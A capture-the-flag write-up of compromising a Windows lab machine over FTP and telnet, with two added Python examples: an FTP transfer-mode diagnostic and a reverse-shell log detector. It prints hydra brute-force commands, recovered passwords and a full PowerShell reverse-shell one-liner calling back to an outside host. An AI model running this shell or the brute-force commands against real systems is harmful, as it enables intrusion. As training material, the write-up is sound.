Access (port 23: telnet login, reverse cmd shell)

```
Nmap scan report for 10.10.10.98
Host is up (0.13s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
21/tcp open ftp
23/tcp open telnet
80/tcp open http

nmap -sV -p 21,23,80 10.10.10.98
21/tcp open ftp Microsoft ftpd
23/tcp open telnet?
80/tcp open http Microsoft IIS httpd 7.5
```

OS: searching for the keyword "IIS 7.5" indicates the system version is Windows 7.

Port 21

Anonymous FTP login

```
ls
08-23-18 08:16PM <DIR> Backups
08-24-18 09:00PM <DIR> Engineer
```

Two files are obtained: Access Control.zip and backup.mdb.

FTP transfer error

```
WARNING! 28296 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
```

So, check whether the transfer actually succeeded.

Size of the mdb file

```
Server file:
08-23-18 08:16PM 5652480 backup.mdb

Local file:
-rw-r--r-- 1 root root 5651666 Dec 27 21:16 backup.mdb
```

After many attempts, I guessed the problem was the file transfer mode: binary vs ASCII.

Too much hassle; rather than transfer from the command line, download a GUI FTP client instead.

Transfer mode problem
When a file is transferred from Windows to a Unix-based server in ASCII mode, the CR (carriage return) at the end of every line is stripped. You may notice that the uploaded file is smaller than the local one.
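The local copy above is 814 bytes short of the server's listing, which is consistent with one byte lost per CRLF pair. The following added example (not from the original post) simulates that ASCII-mode rewrite on a constructed blob standing in for backup.mdb and shows how to tell a line-ending loss from a truncated download by comparing against the server-reported size and a hash.

```python
import hashlib

# Constructed stand-in for backup.mdb: a few header bytes, three CRLF pairs and
# every byte value once, so the blob holds CR and LF both paired and on their own.
ORIGINAL = b"\x00\x01Standard Jet DB\x00" + b"\r\n" * 3 + bytes(range(256))

def ascii_mode_download(data: bytes) -> bytes:
    """Simulate a Unix ftp client in ASCII (TYPE A) mode: every CRLF pair received
    becomes a bare LF, so each CRLF inside a binary file costs one byte, and the
    original cannot be rebuilt afterwards (nothing says which LF used to have a CR)."""
    return data.replace(b"\r\n", b"\n")

def sha256_hex(data: bytes) -> str:
    """Fingerprint for comparing the local copy against a hash taken on the server."""
    return hashlib.sha256(data).hexdigest()

def diagnose(remote_size: int, local: bytes) -> str:
    """Compare the size from the server's directory listing with the local file.
    'ascii-mode': the shortfall is fully explained by CRLF->LF rewriting (every
    lost CR left an LF behind); 'other': truncation or some unrelated fault."""
    if len(local) == remote_size:
        return "ok"
    missing = remote_size - len(local)
    if 0 < missing <= local.count(b"\n"):
        return "ascii-mode"
    return "other"

if __name__ == "__main__":
    got = ascii_mode_download(ORIGINAL)
    print(len(ORIGINAL), len(got), diagnose(len(ORIGINAL), got))  # 280 277 ascii-mode
    print(sha256_hex(ORIGINAL) == sha256_hex(got))                # False
    # Remedy in the ftp client: type `binary` (TYPE I) before `get`, then re-check.
```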


```
hydra -L /root/Desktop/86/user.txt -P /usr/share/wordlists/500-worst-passwords.txt 10.10.10.98 ftp
[21][ftp] host: 10.10.10.98 login: ftp password: 123456
[21][ftp] host: 10.10.10.98 login: ftp password: password
[21][ftp] host: 10.10.10.98 login: ftp password: 12345678
[21][ftp] host: 10.10.10.98 login: ftp password: 1234
[21][ftp] host: 10.10.10.98 login: ftp password: pussy
[21][ftp] host: 10.10.10.98 login: ftp password: 12345
[21][ftp] host: 10.10.10.98 login: ftp password: qwerty
[21][ftp] host: 10.10.10.98 login: ftp password: 696969
[21][ftp] host: 10.10.10.98 login: ftp password: mustang
[21][ftp] host: 10.10.10.98 login: ftp password: letmein
[21][ftp] host: 10.10.10.98 login: ftp password: baseball
[21][ftp] host: 10.10.10.98 login: ftp password: master
[21][ftp] host: 10.10.10.98 login: ftp password: michael
[21][ftp] host: 10.10.10.98 login: ftp password: dragon
[21][ftp] host: 10.10.10.98 login: ftp password: football
[21][ftp] host: 10.10.10.98 login: ftp password: shadow
```

```
apt install filezilla
```
FTP login from the GUI client failed as well.

mdb viewer tool

```
# install tools for reading mdb files
sudo apt-get install mdbtools mdbtools-gmdb mdbtools-dev

# list the tables in the database
mdb-tables backup.mdb
```
mdb-tables crashes with a segmentation fault:
```
offset 7585302654976 is beyond EOF
Segmentation fault
```

Password cracking

```
cd /usr/share/wordlists/ && fcrackzip -D -p long-pass-rockyou.txt -u /root/Desktop/98/a.zip
```
Cracking failed.

Port 23

```
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.

Welcome to Microsoft Telnet Service
```

```
hydra -L /root/Desktop/86/user.txt -P /usr/share/wordlists/500-worst-passwords.txt 10.10.10.98 telnet
```

MS15-002 Telnet service buffer overflow: vulnerability analysis and PoC construction

Port 80

Apart from one image, nothing was found.


The trail goes cold: the zip file's password cannot be cracked, and the database yields no key information.

MS15-034 http.sys

msf successfully read server memory, but it doesn't seem useful; it's all garbage.


References:
https://www.reddit.com/r/linux/comments/4syuw5/working_with_a_pst_file_in_linux/
https://www.youtube.com/watch?v=8B8cs_KkmfQ
http://theevilbit.blogspot.com/2013/01/backtrack-forensics-convert-pst-mail.html

Attack vector
In the mdb database, search for "user" with mdb-tools.

A password is obtained: access4u@security. Use it to open the zip file.

Install evolution to open the pst file:

```
sudo apt-get install evolution evolution-plugins
```

Access Control.pst

```
# convert the pst; this produces an mbox file
readpst Access\ Control.pst
# read the mbox file
mail -f Access\ Control
```

Getting a shell

Login: security / 4Cc3ssC0ntr0ller

```
C:\Users\security\Desktop>type user.txt
ff1f3b48913b213a31ff6756d2553d38

net user

User accounts for \\ACCESS

-------------------------------------------------------------------------------
Administrator engineer Guest
security
The command completed successfully.
```

Privilege escalation

Reference: https://www.cnblogs.com/hack0ne/p/4592536.html

```
C:\Users\security>type t.bat
powershell -executionpolicy bypass C:\Users\Public\s2.ps1

Directory of C:\

08/23/2018 10:05 PM <DIR> inetpub
07/14/2009 03:20 AM <DIR> PerfLogs
08/23/2018 08:53 PM <DIR> Program Files
08/24/2018 07:40 PM <DIR> Program Files (x86)
08/24/2018 07:39 PM <DIR> temp
01/07/2019 08:50 PM <DIR> Users
08/23/2018 10:40 PM <DIR> Windows
08/22/2018 07:23 AM <DIR> ZKTeco
0 File(s) 0 bytes

cd ZKTeco/ZKAccess3.5          (contains many Access database files)

cd inetpub

C:\inetpub>dir
Volume in drive C has no label.
Volume Serial Number is 9C45-DBF0

Directory of C:\inetpub

08/23/2018 10:05 PM <DIR> .
08/23/2018 10:05 PM <DIR> ..
08/21/2018 08:55 PM <DIR> custerr
08/23/2018 10:50 PM <DIR> ftproot
08/24/2018 08:22 PM <DIR> history
08/21/2018 08:55 PM <DIR> logs
08/21/2018 08:55 PM <DIR> temp
08/24/2018 07:39 PM <DIR> wwwroot
0 File(s) 0 bytes
8 Dir(s) 16,620,236,800 bytes free

systeminfo                     (run the command)

Host Name: ACCESS
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-507-9857321-84191
Original Install Date: 8/21/2018, 9:43:10 PM
System Boot Time: 1/7/2019, 8:14:54 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
```

```
net user whale /add            (add a user: insufficient privileges)
Output: System error 5 has occurred.
Access is denied.

net localgroup
Aliases for \\ACCESS

-------------------------------------------------------------------------------
*Administrators
*Backup Operators
*Certificate Service DCOM Access
*Cryptographic Operators
*Distributed COM Users
*Event Log Readers
*Guests
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*Remote Desktop Users
*Replicator
*TelnetClients
*Users
The command completed successfully.

---
net localgroup TelnetClients
security                       (only the security user can log in via telnet)
---
net localgroup Users
Administrator
engineer
NT AUTHORITY\Authenticated Users
NT AUTHORITY\INTERACTIVE
security
The command completed successfully.

---
net localgroup Administrators  (inspect the Administrators group)
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
The command completed successfully.
---

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
(trying to enable RDP on 3389: failed)
---

runas /user:engineer cmd
access4u@security

runas /user:Administrator cmd
123456
No message such as "The command completed successfully." appears, so it presumably failed.
Looked it up: from cmd the only option is to log the user off and log in again as another user.

net localgroup Administrators security /add          (try adding the current user to Administrators: failed)

net localgroup "Remote Desktop Users"
net localgroup "Remote Desktop Users" security /add   (try adding the current user to the Remote Desktop Users group)
```

Attempt 1

A directory was found under the web root; access is denied both from the browser and over telnet. So, google it.

```
C:\inetpub>cd wwwroot

C:\inetpub\wwwroot>dir
Volume in drive C has no label.
Volume Serial Number is 9C45-DBF0

Directory of C:\inetpub\wwwroot

08/24/2018 07:39 PM <DIR> .
08/24/2018 07:39 PM <DIR> ..
08/21/2018 10:30 PM <DIR> aspnet_client
08/23/2018 11:33 PM 391 index.html
08/24/2018 07:39 PM 88,712 out.jpg
2 File(s) 89,103 bytes
3 Dir(s) 16,623,439,872 bytes free
```

```
cd aspnet_client

http://10.10.10.98/aspnet_client/system_web/

403 - Forbidden: Access is denied.
You do not have permission to view this directory or page using the credentials that you supplied.
```

IIS 7.5 source code disclosure / authentication bypass:
https://blog.alertlogic.com/blog/internet-information-server-(iis)-exploitation/

Attempt 2: PowerShell reverse shell

```
nc -lnvp 6688

copy con whale.ps1

$client = New-Object System.Net.Sockets.TCPClient('10.10.14.17',6688);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Yes

type whale.ps1
```
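From the defender's side, the one-liner above has a recognisable shape: a TCPClient socket, a read loop, and iex over whatever arrives. The following added example (not part of the original writeup) scores constructed PowerShell script block log records, modelled on event 4104 ScriptBlockText, against those indicators; the event shapes and the two benign-looking records are assumptions.

```python
import re

# Constructed sample records shaped like PowerShell script block logging
# (Microsoft-Windows-PowerShell/Operational, event 4104) ScriptBlockText fields.
# The first record is the one-liner from this writeup; the other two are made up.
SAMPLE_EVENTS = [
    {"id": 4104, "user": "ACCESS\\security",
     "text": "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.17',6688);"
             "$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};"
             "while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){"
             "$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);"
             "$sendback = (iex $data 2>&1 | Out-String)}"},
    {"id": 4104, "user": "ACCESS\\engineer",
     "text": "Get-ChildItem C:\\ZKTeco\\ZKAccess3.5 -Filter *.mdb | Measure-Object"},
    {"id": 4104, "user": "ACCESS\\security",
     "text": "powershell -executionpolicy bypass C:\\Users\\Public\\s2.ps1"},
]

# Each indicator carries a weight: the socket and the eval of received data are
# the load-bearing parts of a reverse shell; the rest are supporting signals.
INDICATORS = [
    (r"New-Object\s+System\.Net\.Sockets\.TCPClient", 3, "outbound TCP socket opened from script"),
    (r"\.GetStream\(\)", 1, "raw network stream used"),
    (r"\b(iex|Invoke-Expression)\b", 2, "received text evaluated as code"),
    (r"ASCIIEncoding|\[text\.encoding\]::ASCII", 1, "byte buffer decoded for eval/send"),
    (r"-executionpolicy\s+bypass", 1, "execution policy bypassed"),
]

def score_block(text: str) -> tuple[int, list[str]]:
    """Return the summed weight of matched indicators and their descriptions."""
    score, hits = 0, []
    for pattern, weight, why in INDICATORS:
        if re.search(pattern, text, re.IGNORECASE):
            score += weight
            hits.append(why)
    return score, hits

def verdict(score: int) -> str:
    """Socket plus eval (score >= 4) is the reverse-shell signature; a lone
    indicator such as an execution policy bypass is worth a look, not an alert."""
    if score >= 4:
        return "reverse-shell pattern"
    return "suspicious" if score > 0 else "benign"

def classify(events: list[dict]) -> list[tuple[str, str]]:
    """Map each script block event to (user, verdict)."""
    return [(e["user"], verdict(score_block(e["text"])[0])) for e in events]
```

Run `classify(SAMPLE_EVENTS)` to get one (user, verdict) pair per record; the t.bat launcher seen earlier scores as suspicious on the execution policy bypass alone.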

Summary

Next time I should study Windows: how to escalate privileges manually without msf. I've done relatively little Windows privilege escalation.